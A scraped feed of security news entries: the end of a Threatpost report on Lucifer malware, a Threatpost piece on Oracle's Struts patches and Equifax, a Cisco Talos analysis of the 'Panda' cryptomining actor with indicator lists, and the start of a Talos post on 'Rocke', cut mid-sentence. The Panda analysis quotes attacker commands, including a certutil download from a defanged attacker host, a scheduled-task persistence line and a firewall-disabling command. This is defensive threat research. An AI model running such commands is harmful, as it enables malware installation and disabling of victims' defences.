([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), Laravel framework [CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).\n\nAfter successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collecting interface info and sending the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).\n\nThe malware is also capable of self-propagation through various methods.\n\nIt scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42\u2019s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.\n\nIn addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the [EternalBlue](<https://threatpost.com/tag/eternalblue/>), [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>), and [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) exploits.\n\nOnce these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.\n\nLucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.\n\nThese added capabilities show that the malware is growing in sophistication, researchers warn. They say, enterprises can protect themselves with simply security measures such as applying patches and strengthening passwords.\n\n\u201cWhile the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it\u2019s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,\u201d stressed researchers.\n\n_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-24T21:20:16", "type": "threatpost", "title": "Self-Propagating Lucifer Malware Targets Windows Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6287", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-20062", "CVE-2019-9081"], "modified": "2020-06-24T21:20:16", "id": "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "href": "https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-01-23T05:28:33", "description": "Oracle released fixes for a handful of recently patched Apache Struts 2 vulnerabilities, including a critical remote code execution vulnerability (CVE-2017-9805) that could let an attacker take control of an affected system, late last week.\n\nThe Apache Software Foundation patched the RCE vulnerability, which affects servers running apps built using the Struts framework and its REST communication plugin, [earlier this month](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>).\n\nScores of Oracle products, roughly two dozen in total, are affected by the vulnerability. Multiple versions of Oracle\u2019s Financial Services product, in addition to its FLEXCUBE Private Banking product, and WebLogic Server, are included in the advisory. A full list of Oracle products and versions affected by the vulnerability can be found [here](<http://www.oracle.com/technetwork/security-advisory/cve-2017-9805-products-3905487.html>).\n\nOracle also pushed fixes for six other vulnerabilities on Friday, including CVE-2017-7672, CVE-2017-9787, CVE-2017-9791, CVE-2017-9793, CVE-2017-9804, and CVE-2017-12611.\n\nThe United States Computer Emergency Readiness Team (US-CERT) issued an alert around the updates on Monday.\n\n> Oracle Patches Apache Vulnerabilities <https://t.co/rGy95kxj2E>\n> \n> \u2014 US-CERT (@USCERT_gov) [September 25, 2017](<https://twitter.com/USCERT_gov/status/912297399564910594>)\n\nOracle used the advisory as an opportunity to remind users that it fixed CVE-2017-5638, the Struts vulnerability behind [Equifax\u2019s massive breach of 143 million Americans](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>), back in April with its [quarterly Critical Patch Update](<https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>). The company said the April update should have already been applied to customer systems and encouraged admins to apply the fixes in this month\u2019s advisory without delay.\n\nEquifax meanwhile continues to grapple with the fallout surrounding the breach that allowed an attacker to siphon names, Social Security numbers, birth dates, addresses, and other information from its servers [this past summer](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>).\n\nThe credit bureau\u2019s chairman and chief executive Richard Smith retired [on Tuesday](<https://www.equifaxsecurity2017.com/2017/09/26/equifax-chairman-ceo-richard-smith-retires/>) in wake of the breach. In his stead the company said Paulino do Rego Barros Jr., who previously served as president of the company\u2019s Asia-Pacific division, will assume the role of interim chief executive.\n\nPrior to announcing the news, trading of Equifax shares was halted Tuesday morning.\n\nThe CEO will forgo his 2017 bonus according to [a copy of the retirement agreement](<https://www.sec.gov/Archives/edgar/data/33185/000119312517293765/d420554dex101.htm>) between Equifax and Smith posted to the Securities and Exchange Commission. According to the filing Smith will stay on in an unpaid advisory role for at least 90 days. The company says it will defer decisions relating to Smith\u2019s benefits until its Board of Directors completes their independent review of the breach.\n\n\u201cThe cybersecurity incident has affected millions of consumers, and I have been completely dedicated to making this right. At this critical juncture, I believe it is in the best interests of the company to have new leadership to move the company forward,\u201d Smith said in a statement Tuesday.\n\n\u201cOur interim CEO, Paulino, is an experienced leader with deep knowledge of our company and the industry. The Board of Directors has absolute confidence in his ability to guide the company through this transition,\u201d Mark Feidler, the Board\u2019s non-executive chairman, said.\n\nSmith\u2019s departure comes [a week after the company](<Smith's%20departure%20comes%20a%20week%20after%20the%20company%20announced%20its%20chief%20information%20officer%20David%20Webb%20and%20chief%20security%20officer%20Susan%20Mauldin,%20would%20be%20retiring.>) announced its chief information officer David Webb and chief security officer Susan Mauldin, would also be retiring.\n\nDespite retiring, according to reports Smith is still on track to testify before the Senate Banking Committee next week, on Oct. 4.\n\nSmith will likely get an earful from senators next week, including Mark Warner (D-VA). On Tuesday in a hearing with Securities and Exchange Commission (SEC) Chairman Jay Clayton, Warner called out Equifax, calling the company a \u201ctravesty.\u201d\n\n\u201cWe have no ability to opt-in to these systems. We are part of these systems whether we like it or not. I\u2019m often asked in my job on the Intelligence Committee what I think the single greatest vulnerability our country faces is, and I believe it\u2019s cybersecurity.\u201d Warner said.\n\n\u201cI think Equifax is a travesty. I think the resignation of the CEO is by no means enough\u2026 Number one, in terms of the sloppiness of their defenses. Two, in terms of the fact that this was clearly a knowable vulnerability \u2013 they had known for months, and if they had simply put a patch in place we might have precluded this\u2026 I question whether Equifax has the right to even continue providing these services with the level of sloppiness and lack of attention to cybersecurity.\u201d\n", "cvss3": {}, "published": "2017-09-26T14:28:26", "type": "threatpost", "title": "Oracle Patches Apache Struts, Reminds Users to Update Equifax Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7672", "CVE-2017-9787", "CVE-2017-9791", "CVE-2017-9793", "CVE-2017-9804", "CVE-2017-9805"], "modified": "2017-09-26T14:28:26", "id": "THREATPOST:CD1CBFA154DFAA1F3DC0E2E5CFA58D0A", "href": "https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "talosblog": [{"lastseen": "2019-09-17T15:28:34", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. \n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 &amp; Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations. \n\n\n## \n\n\n## COVERAGE\n\nFor coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>) \n \n\n\n[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)\n\nAdvanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors. \n \nCisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or[ Web Security Appliance (WSA](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>)) web scanning prevents access to malicious websites and detects malware used in these attacks. \n \nNetwork Security appliances such as[ Next-Generation Firewall (NGFW](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>)),[ Next-Generation Intrusion Prevention System (NGIPS](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>)), and[ Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat. \n \n[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products. \n \n[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network. \n \nOpen Source SNORT\u24c7 Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>). \n\n\n## IOCs\n\n### Domains\n\na45[.]bulehero[.]in \na46[.]bulehero[.]in \na47[.]bulehero[.]in \na48[.]bulehero[.]in \na88[.]bulehero[.]in \na88[.]heroherohero[.]info \na[.]bulehero[.]in \naic[.]fxxxxxxk[.]me \naxx[.]bulehero[.]in \nb[.]bulehero[.]in \nbulehero[.]in \nc[.]bulehero[.]in \ncb[.]fuckingmy[.].life \ncnm[.]idc3389[.]top \ndown[.]idc3389[.]top \nfid[.]hognoob[.]se \nfxxk[.]noilwut0vv[.]club \nhaq[.]hognoob[.]se \nidc3389[.]top \nidc3389[.]cc \nidc3389[.]pw \nli[.]bulehero2019[.]club \nlist[.]idc3389[.]top \nmi[.]oops[.]best \nmx[.]oops[.]best \nnrs[.]hognoob[.]se \noo[.]mygoodluck[.]best \npool[.]bulehero[.]in \npxi[.]hognoob[.]se \npxx[.]hognoob[.]se \nq1a[.]hognoob[.]se \nqie[.]fxxxxxxk[.]me \nrp[.]oiwcvbnc2e[.]stream \nuio[.]heroherohero[.]info \nuio[.]hognoob[.]se \nupa1[.]hognoob[.]se \nupa2[.]hognoob[.]se \nwiu[.]fxxxxxxk[.]me \nyxw[.]hognoob[.]se \nzik[.]fxxxxxxk[.]me \n\n\n### IPs\n\n184[.]168[.]221[.]47 \n172[.]104[.]87[.]6 \n139[.]162[.]123[.]87 \n139[.]162[.]110[.]201 \n116[.]193[.]154[.]122 \n95[.]128[.]126[.]241 \n195[.]128[.]127[.]254 \n195[.]128[.]126[.]120 \n195[.]128[.]126[.]243 \n195[.]128[.]124[.]140 \n139[.]162[.]71[.]92 \n3[.]123[.]17[.]223 \n46[.]173[.]217[.]80 \n5[.]56[.]133[.]246 \n\n\n### SHA-256\n\n2df8cfa5ea4d63615c526613671bbd02cfa9ddf180a79b4e542a2714ab02a3c1 \nfa4889533cb03fc4ade5b9891d4468bac9010c04456ec6dd8c4aba44c8af9220 \n2f4d46d02757bcf4f65de700487b667f8846c38ddb50fbc5b2ac47cfa9e29beb \n829729471dfd7e6028af430b568cc6e812f09bb47c93f382a123ccf3698c8c08 \n8b645c854a3bd3c3a222acc776301b380e60b5d0d6428db94d53fad6a98fc4ec \n1e4f93a22ccbf35e2f7c4981a6e8eff7c905bc7dbb5fedadd9ed80768e00ab27 \n0697127fb6fa77e80b44c53d2a551862709951969f594df311f10dcf2619c9d5 \nf9a972757cd0d8a837eb30f6a28bc9b5e2a6674825b18359648c50bbb7d6d74a \n34186e115f36584175058dac3d34fe0442d435d6e5f8c5e76f0a3df15c9cd5fb \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n3ed90f9fbc9751a31bf5ab817928d6077ba82113a03232682d864fb6d7c69976 \na415518642ce4ad11ff645151195ca6e7b364da95a8f89326d68c836f4e2cae1 \n4d1f49fac538692902cc627ab7d9af07680af68dd6ed87ab16710d858cc4269c \n8dea116dd237294c8c1f96c3d44007c3cd45a5787a2ef59e839c740bf5459f21 \n991a9a8da992731759a19e470c36654930f0e3d36337e98885e56bd252be927e \na3f1c90ce5c76498621250122186a0312e4f36e3bfcfede882c83d06dd286da1 \n9c37a6b2f4cfbf654c0a5b4a4e78b5bbb3ba26ffbfab393f0d43dad9000cb2d3 \nd5c1848ba6fdc6f260439498e91613a5db8acbef10d203a18f6b9740d2cab3ca \n29b6dc1a00fea36bc3705344abea47ac633bc6dbff0c638b120d72bc6b38a36f \n6d5479adcfa4c31ad565ab40d2ea8651bed6bd68073c77636d1fe86d55d90c8d \n\n\n### Monero Wallets\n\n49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126 \n4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh \n44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L \n \n", "cvss3": {}, "published": "2019-09-17T08:09:45", "type": "talosblog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2017-5638", "CVE-2019-2725"], "modified": "2019-09-17T08:09:45", "id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/3w3NM3N6VuY/panda-evolution.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T19:09:28", "description": "_This post was authored by [David Liebenberg](<https://twitter.com/chinahanddave>). _\n\n \n \n\n\n## Summary\n\n \nCryptocurrency miners are becoming an increasingly significant part of the threat landscape. These malicious miners steal CPU cycles from compromised devices to mine cryptocurrencies and bring in income for the threat actor. \n \nIn this post, we look at the activity of one particular threat actor: Rocke. We will examine several of Rocke's campaigns, malware, and infrastructure while uncovering more information about the actor. After months of research, we believe that Rocke is an actor that must be followed, as they continue to add new features to their malware and are actively exploring new attack vectors. \n \n\n\n## Introduction\n\n \nTalos has written widely about the issue of [cryptomining malware](<https://blog.talosintelligence.com/2018/01/malicious-xmr-mining.html&sa=D&ust=1535643040325000>) and how organizations should [protect systems](<https://blog.talosintelligence.com/2018/07/blocking-cryptomining.html&sa=D&ust=1535643040326000>) against this threat. We continue to actively research developments in this threat through research that includes monitoring criminal forums and deploying honeypot systems to attract these threats. It is through these intelligence sources that the Chinese-speaking actor which we refer to as \"Rocke\" came to our attention. \n \nRocke actively engages in distributing and executing cyrptomining malware using a varied toolkit that includes Git repositories, HttpFileServers (HFS), and a myriad of different payloads, including shell scripts, JavaScript backdoors, as well as ELF and PE miners. \n \n\n\n## Early campaigns\n\n \nThis threat actor initially came to our attention in April 2018, leveraging both Western and Chinese Git repositories to deliver malware to honeypot systems vulnerable to an Apache Struts vulnerability. \n \nSeveral files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999.\" Subsequently, the Gitee user page transitioned to \"c-888.\" Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18.\" \n \nThe repositories on both Gitee and GitLab were identical. All the repositories had a folder called \"ss\" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. \n \nOnce the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space.\" This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java.\" The exact file downloaded depends on the victim's system architecture. Similarly, the system architecture determines if \"h32\" or \"h64\" is used to invoke \"java.\" \n \nAlthough we first observed this actor exploiting vulnerabilities in Apache Struts, we've also observed what we believe to the same individual exploiting an Oracle WebLogic server vulnerability (CVE-2017-10271), and also exploiting CVE-2017-3066, a critical Java deserialization vulnerability in the Adobe ColdFusion platform. \n \n\n\n## Recent campaign\n\n \nIn late July, we became aware that the same actor was engaged in another similar campaign. Through our investigation into this new campaign, we were able to uncover more details about the actor. \n \nWe observed 